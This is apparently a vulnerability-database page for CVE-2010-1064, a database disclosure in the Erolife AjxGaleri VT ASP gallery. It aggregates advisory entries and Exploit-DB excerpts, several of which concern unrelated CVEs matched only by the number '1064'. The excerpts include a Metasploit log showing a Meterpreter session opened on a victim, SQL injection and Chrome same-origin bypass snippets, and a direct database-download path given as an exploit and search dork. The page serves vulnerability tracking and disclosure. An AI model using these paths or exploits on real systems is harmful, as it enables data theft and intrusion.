CVE-2010-1064
published 2010-03-23CVE-2010-1064: Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via…
PriorityP337medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.46%
82.4th percentile
Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/ajxgaleri.mdb.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Aspindir Erolife AjxGaleri VT db/ajxgaleri.mdb access control (EDB-11023 / XFDB-55446)
vuldb·2026-05-03·CVSS 5.0
CVE-2010-1064 [MEDIUM] Aspindir Erolife AjxGaleri VT db/ajxgaleri.mdb access control (EDB-11023 / XFDB-55446)
A vulnerability, which was classified as problematic, was found in Aspindir Erolife AjxGaleri VT. Affected by this issue is some unknown functionality of the file db/ajxgaleri.mdb. Executing a manipulation can lead to improper access controls.
This vulnerability is handled as CVE-2010-1064. The attack can be executed remotely. Additionally, an exploit exists.
GHSA
GHSA-g2xm-x2v9-45p6: Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a dat
ghsa_unreviewed·2022-05-02
CVE-2010-1064 [MEDIUM] GHSA-g2xm-x2v9-45p6: Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a dat
Erolife AjxGaleri VT stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/ajxgaleri.mdb.
No detection rules found.
Exploit-DB
Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
exploitdb·2010-12-02
CVE-2010-5194 Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
Viscom Image Viewer CP Gold 5.5 - 'Image2PDF()' Remote Buffer Overflow (Metasploit)
---
# Image Viewer CP gold v5.5 Buffer Overflow
# Found by: bz1p (AT) bshellz.net
# Impact: Low, NOT marked safe for scripting or initializing
# CVE: ? (0day)
#
# msf exploit(image_viewer_cpgold) >
# [*] Sending exploit to 172.17.120.211:1061...
# [*] Sending stage (749056 bytes) to 172.17.120.211
# [*] Meterpreter session 1 opened (172.17.120.235:4443 -> 172.17.120.211:1064) at 2010-11-15 18:11:32 +1100
#
# msf exploit(image_viewer_cpgold) > sessions -l
#
# Active sessions
# ===============
#
# Id Type Information Connection
# -- ---- ----------- ----------
# 1 meterpreter x86/win32 VICTIMXP\victim @ VICTIM 172.17.120.235:4443 -> 172.17.120.211:1064
#
# msf exploit(image_viewer_cpgold) > sessions -i 1
#
Exploit-DB
xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection
exploitdb·2010-09-18
CVE-2010-4954 xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection
xt:Commerce Gambio 2008 xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064
##############################################################################################
[THANKS TO]
ALLAH - الله لا إله لا ايل
To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION
Exploit-DB
Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
exploitdb·2010-05-19·CVSS 10.0
CVE-2010-1663 [CRITICAL] Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
Google Chrome 4.1.249.1059 - Cross Origin Bypass in Google URL (GURL)
---
# Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
# Author: Jordi Chancel
#
# Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
# Description: {
# The Google URL Parsing Library (aka google-url or GURL) in Google Chrome
# before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy
# via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
# Some PoC :
Inject JavaScript
----
Inject JavaScript
----
Inject JavaScript
----
Inject JavaScript
----
Inject JavaScript
Greetz : Xylitol , Eddy Bordi , 599eme Man , Gno
Exploit-DB
Erolife AjxGaleri VT - Database Disclosure
exploitdb·2010-01-06
CVE-2010-1064 Erolife AjxGaleri VT - Database Disclosure
Erolife AjxGaleri VT - Database Disclosure
---
[»] ~ Note : Mutlu Yillar Millettt
[»] Erolife AjxGaleri VT Database Disclosure Vulnerability
[»] Script: [ Erolife AjxGaleri VT ]
[»] Language: [ ASP ]
[»] Download: [ http://www.aspindir.com/goster/4322]
[»] Founder: [ LionTurk - [email protected] - LionTurk.Turkblog.com }
[»] My Home: [ RevengeHack.com & Ar-ge.Org ]
[»]N0T3 : Yeni Aciklarimi Bekleyin.
###########################################################################
===[ Exploit And Dork ]===
[»] http://localhost/path/db/ajxgaleri.mdb
No writeups or analysis indexed.
http://packetstormsecurity.org/1001-exploits/erolife-disclose.txthttp://secunia.com/advisories/38033http://www.exploit-db.com/exploits/11023https://exchange.xforce.ibmcloud.com/vulnerabilities/55446http://packetstormsecurity.org/1001-exploits/erolife-disclose.txthttp://secunia.com/advisories/38033http://www.exploit-db.com/exploits/11023https://exchange.xforce.ibmcloud.com/vulnerabilities/55446
2010-03-23
Published